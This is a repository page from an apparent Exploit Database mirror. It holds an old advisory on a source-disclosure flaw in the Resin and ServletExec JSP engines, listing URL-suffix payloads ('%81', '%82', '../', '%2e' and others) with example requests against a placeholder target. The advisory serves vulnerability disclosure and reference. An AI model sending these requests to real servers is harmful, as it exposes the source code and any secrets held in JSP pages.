bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/jsp/remote/20429.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

24 lines
No EOL
655 B
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/1986/info
Resin is a servlet and JSP engine that supports java and javascript.
ServletExec will return the source code of JSP files when an HTTP request is appended with certain characters. This vulnerability is dependent on the platform that Resin is running on.
Successful exploitation could lead to the disclosure of sensitive information contained within JSP pages.
Apache (Win32):
..
%2e..
%81
%82
Example: http://target/filename.jsp%81
Resin Web Server:
../
Example: http://target/filename.jsp../
IIS 5 requesting the URL encoded with ASCII:
'%2' instead of '.'
Example: http://target/filename%2ejsp
Reference in a new issue View git blame Copy permalink